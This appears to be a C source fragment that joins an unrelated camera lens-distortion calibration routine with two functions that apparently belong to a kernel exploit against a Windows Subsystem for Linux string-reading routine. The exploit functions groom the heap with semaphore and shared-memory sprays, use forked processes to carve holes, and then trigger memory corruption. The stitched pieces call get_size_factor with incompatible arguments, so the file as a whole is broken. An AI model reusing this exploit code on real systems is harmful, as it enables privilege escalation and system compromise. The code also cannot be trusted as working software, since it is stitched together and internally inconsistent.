void calc_distortion( CALIB_PATT_T *patt, int xsize, int ysize, double dist_factor[4] ) { int i, j; double bx, by; double bf[4]; double error, min; double factor[4]; bx = xsize / 2; by = ysize / 2; factor[0] = bx; factor[1] = by; factor[3] = 1.0; min = calc_distortion2( patt, factor ); bf[0] = factor[0]; bf[1] = factor[1]; bf[2] = factor[2]; bf[3] = 1.0; printf("[%5.1f, %5.1f, %5.1f] %f\n", bf[0], bf[1], bf[2], min); for( j = -10; j <= 10; j++ ) { factor[1] = by + j*5; for( i = -10; i <= 10; i++ ) { factor[0] = bx + i*5; error = calc_distortion2( patt, factor ); if( error < min ) { bf[0] = factor[0]; bf[1] = factor[1]; bf[2] = factor[2]; min = error; } } printf("[%5.1f, %5.1f, %5.1f] %f\n", bf[0], bf[1], bf[2], min); } bx = bf[0]; by = bf[1]; for( j = -10; j <= 10; j++ ) { factor[1] = by + 0.5 * j; for( i = -10; i <= 10; i++ ) { factor[0] = bx + 0.5 * i; error = calc_distortion2( patt, factor ); if( error < min ) { bf[0] = factor[0]; bf[1] = factor[1]; bf[2] = factor[2]; min = error; } } printf("[%5.1f, %5.1f, %5.1f] %f\n", bf[0], bf[1], bf[2], min); } dist_factor[0] = bf[0]; dist_factor[1] = bf[1]; dist_factor[2] = bf[2]; dist_factor[3] = get_size_factor( bf, xsize, ysize ); }
int trigger_corruption(int spray_size) { size_t factor = 0, alloc_size, stopIdx; int ret; alloc_size = get_size_factor(spray_size, &factor); if (alloc_size < 0) { printf("[*err*] unsupported spray_size == 0x%x", spray_size); return -1; } stopIdx = calc_stop_idx(alloc_size, factor); ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx); printf("[*] trigger_corruption() returned 0x%x\n", ret); return 0; }
int shape(size_t *spray_size) { size_t keys[0x400]; int exec[2]; int sv[2]; char flag; size_t bytes = 0, tofree = 0; size_t factor,hole_size; struct flock fl; memset(&fl, 0, sizeof(fl)); pid_t pid, wpid; int status; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) { printf("[*err] socketpair failed\n"); return 1; } bytes = spray(1); if (bytes == (size_t)-1) { printf("[*err*] bytes < 0, are you root?\n"); return 1; } *spray_size = bytes; hole_size = get_size_factor(*spray_size, &factor); tofree = hole_size / (bytes / 1) + 1; printf("[*] allocate holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { keys[i] = alloc_sem(0x7000); } for (int i = 0; i < 0x20; ++i) { alloc_sem(0x7000); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(4063); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(3); } pid = fork(); if (pid > 0) { printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n"); bytes = spray(5); write(sv[1], "p", 1); read(sv[1], &flag, 1); } else { // son read(sv[0], &flag, 1); printf("[*] alloc workspace pages\n"); bytes = spray(tofree); printf("[*] finish allocate workspace allocations\n"); write(sv[0], "p", 1); } if (pid > 0) { printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n"); for (int i = 0; i < 0x100; ++i) { alloc_sem(4061); for (int j = 0; j < 0x5; ++j) { alloc_shm(i * 0x100 + j); } } write(sv[1], "p", 1); } else { read(sv[0], &flag, 1); printf("[*] free middle allocation, creating workspace freed\n"); exit(1); } while ((wpid = wait(&status)) > 0); printf("[*] free prepared holes, create little pages holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { free_sem(keys[i]); } return 0; }